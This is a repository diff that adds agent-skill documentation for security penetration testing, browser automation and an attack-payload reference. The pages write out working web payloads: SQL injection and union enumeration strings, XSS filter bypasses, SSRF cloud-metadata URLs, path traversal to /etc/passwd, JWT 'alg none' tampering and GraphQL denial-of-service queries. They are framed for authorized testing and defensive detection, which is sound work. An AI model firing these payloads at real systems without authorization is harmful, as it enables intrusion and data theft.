@@ -29,6 +29,12 @@ description: "41 engineering - core skills — engineering agent skill and Claud Design scalable, cost-effective AWS architectures for startups with infrastructure-as-code templates. +- **[Azure Cloud Architect](azure-cloud-architect.md)** + + --- + + Design scalable, cost-effective Azure architectures for startups and enterprises with Bicep infrastructure-as-code te... + - **[Code Reviewer](code-reviewer.md)** --- @@ -53,6 +59,12 @@ description: "41 engineering - core skills — engineering agent skill and Claud You are now a world-class epic design expert. You build cinematic, immersive websites that feel premium and alive — u... +- **[GCP Cloud Architect](gcp-cloud-architect.md)** + + --- + + Design scalable, cost-effective Google Cloud architectures for startups and enterprises with infrastructure-as-code t... + - **[Google Workspace CLI](google-workspace-cli.md)** --- @@ -77,6 +89,12 @@ description: "41 engineering - core skills — engineering agent skill and Claud Production-grade Playwright testing toolkit for AI coding agents. +- **[Security Penetration Testing](security-pen-testing.md)** + + --- + + Hands-on offensive security testing skill for finding vulnerabilities before attackers do. This is NOT compliance che... + - **[Self-Improving Agent](self-improving-agent.md)** + 5 sub-skills --- diff --git a/docs/skills/engineering-team/security-pen-testing.md b/docs/skills/engineering-team/security-pen-testing.md new file mode 100644 index 0000000..aa0c158 --- /dev/null +++ b/docs/skills/engineering-team/security-pen-testing.md @@ -0,0 +1,861 @@ +--- +title: "Security Penetration Testing — Agent Skill & Codex Plugin" +description: "Use when the user asks to perform security audits, penetration testing, vulnerability scanning, OWASP Top 10 checks, or offensive security. Agent skill for Claude Code, Codex CLI, Gemini CLI, OpenClaw." +--- + +# Security Penetration Testing + +
+:material-code-braces: Engineering - Core +:material-identifier: `security-pen-testing` +:material-github: Source +
+ +
+Install: claude /plugin install engineering-skills +
+ + +Hands-on offensive security testing skill for finding vulnerabilities before attackers do. This is NOT compliance checking (see senior-secops) or security policy writing (see senior-security) — this is about systematic vulnerability discovery through authorized testing. + +--- + +## Table of Contents + +- [Overview](#overview) +- [OWASP Top 10 Systematic Audit](#owasp-top-10-systematic-audit) +- [Static Analysis](#static-analysis) +- [Dependency Vulnerability Scanning](#dependency-vulnerability-scanning) +- [Secret Scanning](#secret-scanning) +- [API Security Testing](#api-security-testing) +- [Web Vulnerability Testing](#web-vulnerability-testing) +- [Infrastructure Security](#infrastructure-security) +- [Pen Test Report Generation](#pen-test-report-generation) +- [Responsible Disclosure Workflow](#responsible-disclosure-workflow) +- [Workflows](#workflows) +- [Anti-Patterns](#anti-patterns) +- [Cross-References](#cross-references) + +--- + +## Overview + +### What This Skill Does + +This skill provides the methodology, checklists, and automation for **offensive security testing** — actively probing systems to discover exploitable vulnerabilities. It covers web applications, APIs, infrastructure, and supply chain security. + +### Distinction from Other Security Skills + +| Skill | Focus | Approach | +|-------|-------|----------| +| **security-pen-testing** (this) | Finding vulnerabilities | Offensive — simulate attacker techniques | +| senior-secops | Security operations | Defensive — monitoring, incident response, SIEM | +| senior-security | Security policy | Governance — policies, frameworks, risk registers | +| skill-security-auditor | CI/CD gates | Automated — pre-merge security checks | + +### Prerequisites + +All testing described here assumes **written authorization** from the system owner. Unauthorized testing is illegal under the CFAA and equivalent laws worldwide. Always obtain a signed scope-of-work or rules-of-engagement document before starting. + +--- + +## OWASP Top 10 Systematic Audit + +Use the vulnerability scanner tool for automated checklist generation: + +```bash +# Generate OWASP checklist for a web application +python scripts/vulnerability_scanner.py --target web --scope full + +# Quick API-focused scan +python scripts/vulnerability_scanner.py --target api --scope quick --json +``` + +### A01:2021 — Broken Access Control + +**Test Procedures:** +1. Attempt horizontal privilege escalation: access another user's resources by changing IDs +2. Test vertical escalation: access admin endpoints with regular user tokens +3. Verify CORS configuration — check `Access-Control-Allow-Origin` for wildcards +4. Test forced browsing to admin pages (`/admin`, `/api/admin`, `/debug`) +5. Modify JWT claims (`role`, `is_admin`) and replay tokens + +**What to Look For:** +- Missing authorization checks on API endpoints +- Predictable resource IDs (sequential integers vs. UUIDs) +- Client-side only access controls (hidden UI elements without server checks) +- CORS misconfigurations allowing arbitrary origins + +### A02:2021 — Cryptographic Failures + +**Test Procedures:** +1. Check TLS version — reject anything below TLS 1.2 +2. Verify password hashing: bcrypt/scrypt/argon2 with adequate cost factor +3. Look for sensitive data in URLs (tokens in query params get logged) +4. Check for hardcoded encryption keys in source code +5. Test for weak random number generation (Math.random() for tokens) + +**What to Look For:** +- MD5/SHA1 used for password hashing +- Secrets in environment variables without encryption at rest +- Missing `Strict-Transport-Security` header +- Self-signed certificates in production + +### A03:2021 — Injection + +**Test Procedures:** +1. SQL injection: test all input fields with `' OR 1=1--` and time-based payloads +2. NoSQL injection: test with `{"$gt": ""}` and `{"$ne": null}` in JSON bodies +3. Command injection: test inputs with `; whoami` and backtick substitution +4. LDAP injection: test with `*)(uid=*))(|(uid=*` +5. Template injection: test with `{{7*7}}` and `${7*7}` + +**What to Look For:** +- String concatenation in SQL queries +- User input passed to `eval()`, `exec()`, `os.system()` +- Unparameterized ORM queries +- Template engines rendering user input without sandboxing + +### A04:2021 — Insecure Design + +**Test Procedures:** +1. Review business logic flows for abuse scenarios (e.g., negative quantities in carts) +2. Check rate limiting on sensitive operations (login, password reset, OTP) +3. Test multi-step flows for state manipulation (skip payment step) +4. Verify security questions aren't guessable + +**What to Look For:** +- Missing rate limits on authentication endpoints +- Business logic that trusts client-side calculations +- Lack of account lockout after failed attempts +- Missing CAPTCHA on public-facing forms + +### A05:2021 — Security Misconfiguration + +**Test Procedures:** +1. Check for default credentials on admin panels +2. Verify unnecessary HTTP methods are disabled (TRACE, DELETE on public endpoints) +3. Check error handling — stack traces should never leak to users +4. Review HTTP security headers (CSP, X-Frame-Options, X-Content-Type-Options) +5. Check directory listing is disabled + +**What to Look For:** +- Debug mode enabled in production +- Default admin:admin credentials +- Verbose error messages with stack traces +- Missing security headers + +### A06:2021 — Vulnerable and Outdated Components + +**Test Procedures:** +1. Run dependency audit against known CVE databases +2. Check for end-of-life frameworks and libraries +3. Verify transitive dependency versions +4. Check for known vulnerable versions (e.g., Log4j 2.0-2.14.1) + +```bash +# Audit a package manifest +python scripts/dependency_auditor.py --file package.json --severity high +python scripts/dependency_auditor.py --file requirements.txt --json +``` + +### A07:2021 — Identification and Authentication Failures + +**Test Procedures:** +1. Test brute force protection on login endpoints +2. Check password policy enforcement (minimum length, complexity) +3. Verify session invalidation on logout and password change +4. Test "remember me" token security (HttpOnly, Secure, SameSite flags) +5. Check multi-factor authentication bypass paths + +**What to Look For:** +- Sessions that persist after logout +- Missing `HttpOnly` and `Secure` flags on session cookies +- Password reset tokens that don't expire +- Username enumeration via different error messages + +### A08:2021 — Software and Data Integrity Failures + +**Test Procedures:** +1. Check for unsigned updates or deployment artifacts +2. Verify CI/CD pipeline integrity (signed commits, protected branches) +3. Test deserialization endpoints with crafted payloads +4. Check for SRI (Subresource Integrity) on CDN-loaded scripts + +**What to Look For:** +- Unsafe deserialization of user input (pickle, Java serialization) +- Missing integrity checks on downloaded artifacts +- CI/CD pipelines running untrusted code +- CDN scripts without SRI hashes + +### A09:2021 — Security Logging and Monitoring Failures + +**Test Procedures:** +1. Verify authentication events are logged (success and failure) +2. Check that logs don't contain sensitive data (passwords, tokens, PII) +3. Test alerting thresholds (do 50 failed logins trigger an alert?) +4. Verify log integrity — can an attacker tamper with logs? + +**What to Look For:** +- Missing audit trail for admin actions +- Passwords or tokens appearing in logs +- No alerting on suspicious patterns +- Logs stored without integrity protection + +### A10:2021 — Server-Side Request Forgery (SSRF) + +**Test Procedures:** +1. Test URL input fields with internal addresses (`http://169.254.169.254/` for cloud metadata) +2. Check for open redirect chains that reach internal services +3. Test with DNS rebinding payloads +4. Verify allowlist validation on outbound requests + +**What to Look For:** +- User-controlled URLs passed to `fetch()`, `requests.get()`, `curl` +- Missing allowlist on outbound HTTP requests +- Ability to reach cloud metadata endpoints (AWS, GCP, Azure) +- PDF generators or screenshot services that fetch arbitrary URLs + +--- + +## Static Analysis + +### CodeQL Custom Rules + +Write custom CodeQL queries for project-specific vulnerability patterns: + +```ql +/** + * Detect SQL injection via string concatenation + */ +import python +import semmle.python.dataflow.new.DataFlow + +from Call call, StringFormatting fmt +where + call.getFunc().getName() = "execute" and + fmt = call.getArg(0) and + exists(DataFlow::Node source | + source.asExpr() instanceof Name and + DataFlow::localFlow(source, DataFlow::exprNode(fmt.getAnOperand())) + ) +select call, "Potential SQL injection: user input flows into execute()" +``` + +### Semgrep Custom Rules + +Create project-specific Semgrep rules: + +```yaml +rules: + - id: hardcoded-jwt-secret + pattern: | + jwt.encode($PAYLOAD, "...", ...) + message: "JWT signed with hardcoded secret" + severity: ERROR + languages: [python] + + - id: unsafe-yaml-load + pattern: yaml.load($DATA) + fix: yaml.safe_load($DATA) + message: "Use yaml.safe_load() to prevent arbitrary code execution" + severity: WARNING + languages: [python] + + - id: express-no-helmet + pattern: | + const app = express(); + ... + app.listen(...) + pattern-not: | + const app = express(); + ... + app.use(helmet(...)); + ... + app.listen(...) + message: "Express app missing helmet middleware for security headers" + severity: WARNING + languages: [javascript, typescript] +``` + +### ESLint Security Plugins + +Recommended configuration: + +```json +{ + "plugins": ["security", "no-unsanitized"], + "extends": ["plugin:security/recommended"], + "rules": { + "security/detect-object-injection": "error", + "security/detect-non-literal-regexp": "warn", + "security/detect-unsafe-regex": "error", + "security/detect-buffer-noassert": "error", + "security/detect-eval-with-expression": "error", + "no-unsanitized/method": "error", + "no-unsanitized/property": "error" + } +} +``` + +--- + +## Dependency Vulnerability Scanning + +### Ecosystem-Specific Commands + +```bash +# Node.js +npm audit --json | jq '.vulnerabilities | to_entries[] | select(.value.severity == "critical")' + +# Python +pip audit --format json --desc +safety check --json + +# Go +govulncheck ./... + +# Ruby +bundle audit check --update +``` + +### CVE Triage Workflow + +1. **Collect**: Run ecosystem audit tools, aggregate findings +2. **Deduplicate**: Group by CVE ID across direct and transitive deps +3. **Score**: Use CVSS base score + environmental adjustments +4. **Prioritize**: Critical + exploitable + reachable = fix immediately +5. **Remediate**: Upgrade, patch, or mitigate with compensating controls +6. **Verify**: Rerun audit to confirm fix, update lock files + +```bash +# Use the dependency auditor for automated triage +python scripts/dependency_auditor.py --file package.json --severity critical --json +``` + +### Known Vulnerable Patterns + +| Package | Vulnerable Versions | CVE | Impact | +|---------|-------------------|-----|--------| +| log4j-core | 2.0 - 2.14.1 | CVE-2021-44228 | RCE via JNDI injection | +| lodash | < 4.17.21 | CVE-2021-23337 | Prototype pollution | +| axios | < 1.6.0 | CVE-2023-45857 | CSRF token exposure | +| pillow | < 9.3.0 | CVE-2022-45198 | DoS via crafted image | +| express | < 4.19.2 | CVE-2024-29041 | Open redirect | + +--- + +## Secret Scanning + +### TruffleHog Patterns + +```bash +# Scan git history for secrets +trufflehog git file://. --only-verified --json + +# Scan filesystem (no git history) +trufflehog filesystem . --json +``` + +### Gitleaks Configuration + +```toml +# .gitleaks.toml +title = "Custom Gitleaks Config" + +[[rules]] +id = "aws-access-key" +description = "AWS Access Key ID" +regex = '''AKIA[0-9A-Z]{16}''' +tags = ["aws", "credentials"] + +[[rules]] +id = "generic-api-key" +description = "Generic API Key" +regex = '''(?i)(api[_-]?key|apikey)\s*[:=]\s*['\"][a-zA-Z0-9]{20,}['\"]''' +tags = ["api", "key"] + +[[rules]] +id = "private-key" +description = "Private Key Header" +regex = '''-----BEGIN (RSA|EC|DSA|OPENSSH) PRIVATE KEY-----''' +tags = ["private-key"] + +[allowlist] +paths = ['''\.test\.''', '''_test\.go''', '''mock''', '''fixture'''] +``` + +### Pre-commit Hook Integration + +```yaml +# .pre-commit-config.yaml +repos: + - repo: https://github.com/gitleaks/gitleaks + rev: v8.18.0 + hooks: + - id: gitleaks + + - repo: https://github.com/trufflesecurity/trufflehog + rev: v3.63.0 + hooks: + - id: trufflehog + args: ["git", "file://.", "--since-commit", "HEAD", "--only-verified"] +``` + +### CI Integration (GitHub Actions) + +```yaml +name: Secret Scan +on: [push, pull_request] +jobs: + scan: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + with: + fetch-depth: 0 + - uses: trufflesecurity/trufflehog@main + with: + extra_args: --only-verified +``` + +--- + +## API Security Testing + +### Authentication Bypass + +**JWT Manipulation:** +1. Decode token at jwt.io — inspect claims without verification +2. Change `alg` to `none` and remove signature: `eyJ...payload.` +3. Change `alg` from RS256 to HS256 and sign with the public key +4. Modify claims (`role: "admin"`, `exp: 9999999999`) and re-sign with weak secrets +5. Test key confusion: HMAC signed with RSA public key bytes + +**Session Fixation:** +1. Obtain a session token before authentication +2. Authenticate — check if the session ID changes +3. If the same session ID persists, the app is vulnerable to session fixation + +### Authorization Flaws + +**IDOR (Insecure Direct Object Reference):** +``` +GET /api/users/123/profile → 200 (your profile) +GET /api/users/124/profile → 200 (someone else's profile — IDOR!) +GET /api/users/124/profile → 403 (properly protected) +``` + +Test pattern: Change numeric IDs, UUIDs, slugs in every endpoint. Use Burp Intruder or a simple script to iterate. + +**BOLA (Broken Object Level Authorization):** +Same as IDOR but specifically in REST APIs. Test every CRUD operation: +- Can user A read user B's resource? +- Can user A update user B's resource? +- Can user A delete user B's resource? + +**BFLA (Broken Function Level Authorization):** +``` +# Regular user tries admin endpoints +POST /api/admin/users → Should be 403 +DELETE /api/admin/users/123 → Should be 403 +PUT /api/settings/global → Should be 403 +``` + +### Rate Limiting Validation + +Test rate limits on critical endpoints: +```bash +# Rapid-fire login attempts +for i in $(seq 1 100); do + curl -s -o /dev/null -w "%{http_code}" \ + -X POST https://target.com/api/login \ + -d '{"email":"test@test.com","password":"wrong"}'; +done +# Expect: 429 after threshold (typically 5-10 attempts) +``` + +### Mass Assignment Detection + +```bash +# Try adding admin fields to a regular update request +PUT /api/users/profile +{ + "name": "Normal User", + "email": "user@test.com", + "role": "admin", # mass assignment attempt + "is_verified": true, # mass assignment attempt + "subscription": "enterprise" # mass assignment attempt +} +``` + +### GraphQL-Specific Testing + +**Introspection Query:** +```graphql +{ + __schema { + types { name fields { name type { name } } } + } +} +``` +Introspection should be **disabled in production**. + +**Query Depth Attack:** +```graphql +{ + user(id: 1) { + friends { + friends { + friends { + friends { # Keep nesting until server crashes + name + } + } + } + } + } +} +``` + +**Batching Attack:** +```json +[ + {"query": "mutation { login(user:\"admin\", pass:\"password1\") { token } }"}, + {"query": "mutation { login(user:\"admin\", pass:\"password2\") { token } }"}, + {"query": "mutation { login(user:\"admin\", pass:\"password3\") { token } }"} +] +``` +Batch mutations can bypass rate limiting if counted as a single request. + +--- + +## Web Vulnerability Testing + +### XSS (Cross-Site Scripting) + +**Reflected XSS Test Payloads** (non-destructive): +``` + +"> +javascript:alert(document.domain) + +'-alert(document.domain)-' + +``` + +**Stored XSS**: Submit payloads in persistent fields (comments, profiles, messages), then check if they render for other users. + +**DOM-Based XSS**: Look for `innerHTML`, `document.write()`, `eval()` operating on `location.hash`, `location.search`, or `document.referrer`. + +### CSRF Token Validation + +1. Capture a legitimate request with CSRF token +2. Replay the request without the token — should fail (403) +3. Replay with a token from a different session — should fail +4. Check if token changes per request or is static per session +5. Verify `SameSite` cookie attribute is set to `Strict` or `Lax` + +### SQL Injection + +**Detection Payloads** (safe, non-destructive): +``` +' OR '1'='1 +' OR '1'='1' -- +" OR "1"="1 +1 OR 1=1 +' UNION SELECT NULL-- +' AND SLEEP(5)-- (time-based blind) +' AND 1=1-- (boolean-based blind) +``` + +**Union-Based Enumeration** (authorized testing only): +```sql +' UNION SELECT 1,2,3-- -- Find column count +' UNION SELECT table_name,2,3 FROM information_schema.tables-- +' UNION SELECT column_name,2,3 FROM information_schema.columns WHERE table_name='users'-- +``` + +**Time-Based Blind:** +```sql +' AND IF(1=1, SLEEP(5), 0)-- -- MySQL +' AND pg_sleep(5)-- -- PostgreSQL +' WAITFOR DELAY '0:0:5'-- -- MSSQL +``` + +### SSRF Detection + +**Payloads for SSRF testing:** +``` +http://127.0.0.1 +http://localhost +http://169.254.169.254/latest/meta-data/ (AWS metadata) +http://metadata.google.internal/ (GCP metadata) +http://169.254.169.254/metadata/instance (Azure metadata) +http://[::1] (IPv6 localhost) +http://0x7f000001 (hex encoding) +http://2130706433 (decimal encoding) +``` + +### Path Traversal + +``` +GET /api/files?name=../../../etc/passwd +GET /api/files?name=....//....//....//etc/passwd +GET /api/files?name=%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd +GET /api/files?name=..%252f..%252f..%252fetc%252fpasswd (double encoding) +``` + +--- + +## Infrastructure Security + +### Misconfigured Cloud Storage + +**S3 Bucket Checks:** +```bash +# Check for public read access +aws s3 ls s3://target-bucket --no-sign-request + +# Check bucket policy +aws s3api get-bucket-policy --bucket target-bucket + +# Check ACL +aws s3api get-bucket-acl --bucket target-bucket +``` + +**Common Bucket Name Patterns:** +``` +{company}-backup, {company}-dev, {company}-staging +{company}-assets, {company}-uploads, {company}-logs +``` + +### HTTP Security Headers + +Required headers and expected values: + +| Header | Expected Value | +|--------|---------------| +| `Strict-Transport-Security` | `max-age=31536000; includeSubDomains; preload` | +| `Content-Security-Policy` | Restrictive policy, no `unsafe-inline` or `unsafe-eval` | +| `X-Content-Type-Options` | `nosniff` | +| `X-Frame-Options` | `DENY` or `SAMEORIGIN` | +| `Referrer-Policy` | `strict-origin-when-cross-origin` | +| `Permissions-Policy` | Restrict camera, microphone, geolocation | +| `X-XSS-Protection` | `0` (deprecated, CSP is preferred) | + +### TLS Configuration + +```bash +# Check TLS version and cipher suites +nmap --script ssl-enum-ciphers -p 443 target.com + +# Quick check with testssl.sh +./testssl.sh target.com + +# Check certificate expiry +echo | openssl s_client -connect target.com:443 2>/dev/null | openssl x509 -noout -dates +``` + +**Reject:** TLS 1.0, TLS 1.1, RC4, DES, 3DES, MD5 in cipher suites, CBC mode ciphers (BEAST), export-grade ciphers. + +### Open Port Scanning + +```bash +# Quick top-1000 ports +nmap -sV target.com + +# Full port scan +nmap -p- -sV target.com + +# Common dangerous open ports +# 21 (FTP), 23 (Telnet), 445 (SMB), 3389 (RDP), 6379 (Redis), 27017 (MongoDB) +``` + +--- + +## Pen Test Report Generation + +Generate professional reports from structured findings: + +```bash +# Generate markdown report from findings JSON +python scripts/pentest_report_generator.py --findings findings.json --format md --output report.md + +# Generate JSON report +python scripts/pentest_report_generator.py --findings findings.json --format json --output report.json +``` + +### Findings JSON Format + +```json +[ + { + "title": "SQL Injection in Login Endpoint", + "severity": "critical", + "cvss_score": 9.8, + "cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "category": "A03:2021 - Injection", + "description": "The /api/login endpoint is vulnerable to SQL injection via the email parameter.", + "evidence": "Request: POST /api/login {\"email\": \"' OR 1=1--\", \"password\": \"x\"}\nResponse: 200 OK with admin session token", + "impact": "Full database access, authentication bypass, potential remote code execution", + "remediation": "Use parameterized queries. Replace string concatenation with prepared statements.", + "references": ["https://cwe.mitre.org/data/definitions/89.html"] + } +] +``` + +### Report Structure + +1. **Executive Summary**: Business impact, overall risk level, top 3 findings +2. **Scope**: What was tested, what was excluded, testing dates +3. **Methodology**: Tools used, testing approach (black/gray/white box) +4. **Findings Table**: Sorted by severity with CVSS scores +5. **Detailed Findings**: Each with description, evidence, impact, remediation +6. **Remediation Priority Matrix**: Effort vs. impact for each fix +7. **Appendix**: Raw tool output, full payload lists + +--- + +## Responsible Disclosure Workflow + +Responsible disclosure is **mandatory** for any vulnerability found during authorized testing or independent research. See `references/responsible_disclosure.md` for full templates. + +### Timeline + +| Day | Action | +|-----|--------| +| 0 | Discovery — document finding with evidence | +| 1 | Report to vendor via security contact or bug bounty program | +| 7 | Follow up if no acknowledgment received | +| 30 | Request status update and remediation timeline | +| 60 | Second follow-up — offer technical assistance | +| 90 | Public disclosure (with or without fix, per industry standard) | + +### Key Principles + +1. **Never exploit beyond proof of concept** — demonstrate impact without causing damage +2. **Encrypt all communications** — PGP/GPG for email, secure channels for details +3. **Do not access, modify, or exfiltrate real user data** — use your own test accounts +4. **Document everything** — timestamps, screenshots, request/response pairs +5. **Respect the vendor's timeline** — extend deadline if they're actively working on a fix + +--- + +## Workflows + +### Workflow 1: Quick Security Check (15 Minutes) + +For pre-merge reviews or quick health checks: + +```bash +# 1. Generate OWASP checklist +python scripts/vulnerability_scanner.py --target web --scope quick + +# 2. Scan dependencies +python scripts/dependency_auditor.py --file package.json --severity high + +# 3. Check for secrets in recent commits +# (Use gitleaks or trufflehog as described in Secret Scanning section) + +# 4. Review HTTP security headers +curl -sI https://target.com | grep -iE "(strict-transport|content-security|x-frame|x-content-type)" +``` + +**Decision**: If any critical or high findings, block the merge. + +### Workflow 2: Full Penetration Test (Multi-Day Assessment) + +**Day 1 — Reconnaissance:** +1. Map the attack surface: endpoints, authentication flows, third-party integrations +2. Run automated OWASP checklist (full scope) +3. Run dependency audit across all manifests +4. Run secret scan on full git history + +**Day 2 — Manual Testing:** +1. Test authentication and authorization (IDOR, BOLA, BFLA) +2. Test injection points (SQLi, XSS, SSRF, command injection) +3. Test business logic flaws +4. Test API-specific vulnerabilities (GraphQL, rate limiting, mass assignment) + +**Day 3 — Infrastructure and Reporting:** +1. Check cloud storage permissions +2. Verify TLS configuration and security headers +3. Port scan for unnecessary services +4. Compile findings into structured JSON +5. Generate pen test report + +```bash +# Generate final report +python scripts/pentest_report_generator.py --findings findings.json --format md --output pentest-report.md +``` + +### Workflow 3: CI/CD Security Gate + +Automated security checks that run on every pull request: + +```yaml +# .github/workflows/security-gate.yml +name: Security Gate +on: [pull_request] +jobs: + security: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + with: + fetch-depth: 0 + + # Secret scanning + - name: Scan for secrets + uses: trufflesecurity/trufflehog@main + with: + extra_args: --only-verified + + # Dependency audit + - name: Audit dependencies + run: | + npm audit --audit-level=high + pip audit --desc + + # SAST + - name: Static analysis + uses: returntocorp/semgrep-action@v1 + with: + config: >- + p/security-audit + p/secrets + p/owasp-top-ten + + # Security headers check (staging only) + - name: Check security headers + if: github.base_ref == 'staging' + run: | + curl -sI $STAGING_URL | python scripts/vulnerability_scanner.py --target web --scope quick +``` + +**Gate Policy**: Block merge on critical/high findings. Warn on medium. Log low/info. + +--- + +## Anti-Patterns + +1. **Testing in production without authorization** — Always get written permission and use staging/test environments when possible +2. **Ignoring low-severity findings** — Low findings compound; a chain of lows can become a critical exploit path +3. **Skipping responsible disclosure** — Every vulnerability found must be reported through proper channels +4. **Relying solely on automated tools** — Tools miss business logic flaws, chained exploits, and novel attack vectors +5. **Testing without a defined scope** — Scope creep leads to legal liability; document what is and isn't in scope +6. **Reporting without remediation guidance** — Every finding must include actionable remediation steps +7. **Storing evidence insecurely** — Pen test evidence (screenshots, payloads, tokens) is sensitive; encrypt and restrict access +8. **One-time testing** — Security testing must be continuous; integrate into CI/CD and schedule periodic assessments + +--- + +## Cross-References + +| Skill | Relationship | +|-------|-------------| +| [senior-secops](https://github.com/alirezarezvani/claude-skills/tree/main/engineering-team/senior-secops/SKILL.md) | Defensive security operations — monitoring, incident response, SIEM configuration | +| [senior-security](https://github.com/alirezarezvani/claude-skills/tree/main/engineering-team/senior-security/SKILL.md) | Security policy and governance — frameworks, risk registers, compliance | +| [dependency-auditor](https://github.com/alirezarezvani/claude-skills/tree/main/engineering/dependency-auditor/SKILL.md) | Deep supply chain security — SBOMs, license compliance, transitive risk | +| [code-reviewer](https://github.com/alirezarezvani/claude-skills/tree/main/engineering-team/code-reviewer/SKILL.md) | Code review practices — includes security review checklist | diff --git a/docs/skills/engineering/browser-automation.md b/docs/skills/engineering/browser-automation.md new file mode 100644 index 0000000..1c15b08 --- /dev/null +++ b/docs/skills/engineering/browser-automation.md @@ -0,0 +1,575 @@ +--- +title: "Browser Automation — Agent Skill for Codex & OpenClaw" +description: "Use when the user asks to automate browser tasks, scrape websites, fill forms, capture screenshots, extract structured data from web pages, or build. Agent skill for Claude Code, Codex CLI, Gemini CLI, OpenClaw." +--- + +# Browser Automation + +
+:material-rocket-launch: Engineering - POWERFUL +:material-identifier: `browser-automation` +:material-github: Source +
+ +
+Install: claude /plugin install engineering-advanced-skills +
+ + +## Overview + +The Browser Automation skill provides comprehensive tools and knowledge for building production-grade web automation workflows using Playwright. This skill covers data extraction, form filling, screenshot capture, session management, and anti-detection patterns for reliable browser automation at scale. + +**When to use this skill:** +- Scraping structured data from websites (tables, listings, search results) +- Automating multi-step browser workflows (login, fill forms, download files) +- Capturing screenshots or PDFs of web pages +- Extracting data from SPAs and JavaScript-heavy sites +- Building repeatable browser-based data pipelines + +**When NOT to use this skill:** +- Writing browser tests or E2E test suites — use **playwright-pro** instead +- Testing API endpoints — use **api-test-suite-builder** instead +- Load testing or performance benchmarking — use **performance-profiler** instead + +**Why Playwright over Selenium or Puppeteer:** +- **Auto-wait built in** — no explicit `sleep()` or `waitForElement()` needed for most actions +- **Multi-browser from one API** — Chromium, Firefox, WebKit with zero config changes +- **Network interception** — block ads, mock responses, capture API calls natively +- **Browser contexts** — isolated sessions without spinning up new browser instances +- **Codegen** — `playwright codegen` records your actions and generates scripts +- **Async-first** — Python async/await for high-throughput scraping + +## Core Competencies + +### 1. Web Scraping Patterns + +#### DOM Extraction with CSS Selectors +CSS selectors are the primary tool for element targeting. Prefer them over XPath for readability and performance. + +**Selector priority (most to least reliable):** +1. `data-testid`, `data-id`, or custom data attributes — stable across redesigns +2. `#id` selectors — unique but may change between deploys +3. Semantic selectors: `article`, `nav`, `main`, `section` — resilient to CSS changes +4. Class-based: `.product-card`, `.price` — brittle if classes are generated (e.g., CSS modules) +5. Positional: `nth-child()`, `nth-of-type()` — last resort, breaks on layout changes + +**Compound selectors for precision:** +```python +# Product cards within a specific container +page.query_selector_all("div.search-results > article.product-card") + +# Price inside a product card (scoped) +card.query_selector("span[data-field='price']") + +# Links with specific text content +page.locator("a", has_text="Next Page") +``` + +#### XPath for Complex Traversal +Use XPath only when CSS cannot express the relationship: +```python +# Find element by text content (XPath strength) +page.locator("//td[contains(text(), 'Total')]/following-sibling::td[1]") + +# Navigate up the DOM tree +page.locator("//span[@class='price']/ancestor::div[@class='product']") +``` + +#### Pagination Patterns +- **Next-button pagination**: Click "Next" until disabled or absent +- **URL-based pagination**: Increment `?page=N` or `&offset=N` in URL +- **Infinite scroll**: Scroll to bottom, wait for new content, repeat until no change +- **Load-more button**: Click button, wait for DOM mutation, repeat + +#### Infinite Scroll Handling +```python +async def scroll_to_bottom(page, max_scrolls=50, pause_ms=1500): + previous_height = 0 + for i in range(max_scrolls): + current_height = await page.evaluate("document.body.scrollHeight") + if current_height == previous_height: + break + await page.evaluate("window.scrollTo(0, document.body.scrollHeight)") + await page.wait_for_timeout(pause_ms) + previous_height = current_height + return i + 1 # number of scrolls performed +``` + +### 2. Form Filling & Multi-Step Workflows + +#### Login Flows +```python +async def login(page, url, username, password): + await page.goto(url) + await page.fill("input[name='username']", username) + await page.fill("input[name='password']", password) + await page.click("button[type='submit']") + # Wait for navigation to complete (post-login redirect) + await page.wait_for_url("**/dashboard**") +``` + +#### Multi-Page Forms +Break multi-step forms into discrete functions per step. Each function: +1. Fills the fields for that step +2. Clicks the "Next" or "Continue" button +3. Waits for the next step to load (URL change or DOM element) + +```python +async def fill_step_1(page, data): + await page.fill("#first-name", data["first_name"]) + await page.fill("#last-name", data["last_name"]) + await page.select_option("#country", data["country"]) + await page.click("button:has-text('Continue')") + await page.wait_for_selector("#step-2-form") + +async def fill_step_2(page, data): + await page.fill("#address", data["address"]) + await page.fill("#city", data["city"]) + await page.click("button:has-text('Continue')") + await page.wait_for_selector("#step-3-form") +``` + +#### File Uploads +```python +# Single file +await page.set_input_files("input[type='file']", "/path/to/file.pdf") + +# Multiple files +await page.set_input_files("input[type='file']", [ + "/path/to/file1.pdf", + "/path/to/file2.pdf" +]) + +# Drag-and-drop upload zones (no visible input element) +async with page.expect_file_chooser() as fc_info: + await page.click("div.upload-zone") +file_chooser = await fc_info.value +await file_chooser.set_files("/path/to/file.pdf") +``` + +#### Dropdown and Select Handling +```python +# Native + +
+``` + +**Filter bypass payloads:** +``` + +ipt>alert(document.domain)ipt> + + + +javascript:alert(document.domain)// +``` + +**URL encoding payloads:** +``` +%3Cscript%3Ealert(document.domain)%3C/script%3E +%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E +``` + +**Context-specific payloads:** + +Inside HTML attribute: +``` +" onmouseover="alert(document.domain) +' onfocus='alert(document.domain)' autofocus=' +``` + +Inside JavaScript string: +``` +';alert(document.domain);// +\';alert(document.domain);// + +``` + +Inside CSS: +``` +expression(alert(document.domain)) +url(javascript:alert(document.domain)) +``` + +### Stored XSS + +Test these in persistent fields: user profiles, comments, forum posts, file upload names, chat messages. + +``` + +click me + +``` + +### DOM-Based XSS + +Look for JavaScript that reads from these sources and writes to dangerous sinks: + +**Sources** (attacker-controlled input): +``` +document.location +document.location.hash +document.location.search +document.referrer +window.name +document.cookie +localStorage / sessionStorage +postMessage data +``` + +**Sinks** (dangerous output): +``` +element.innerHTML +element.outerHTML +document.write() +document.writeln() +eval() +setTimeout(string) +setInterval(string) +new Function(string) +element.setAttribute("onclick", ...) +location.href = ... +location.assign(...) +``` + +**Detection pattern:** Search for any code path where a Source flows into a Sink without sanitization. + +--- + +## SQL Injection Detection Patterns + +### Detection Payloads + +**Error-based detection:** +``` +' -- Single quote triggers SQL error +" -- Double quote +\ -- Backslash +' OR '1'='1 -- Boolean true +' OR '1'='2 -- Boolean false (compare responses) +' AND 1=1-- -- Boolean true with comment +' AND 1=2-- -- Boolean false (compare responses) +1 OR 1=1 -- Numeric injection +1 AND 1=2 -- Numeric false +``` + +**Union-based enumeration** (authorized testing only): +```sql +-- Step 1: Find column count +' ORDER BY 1-- +' ORDER BY 2-- +' ORDER BY 3-- -- Increment until error +' UNION 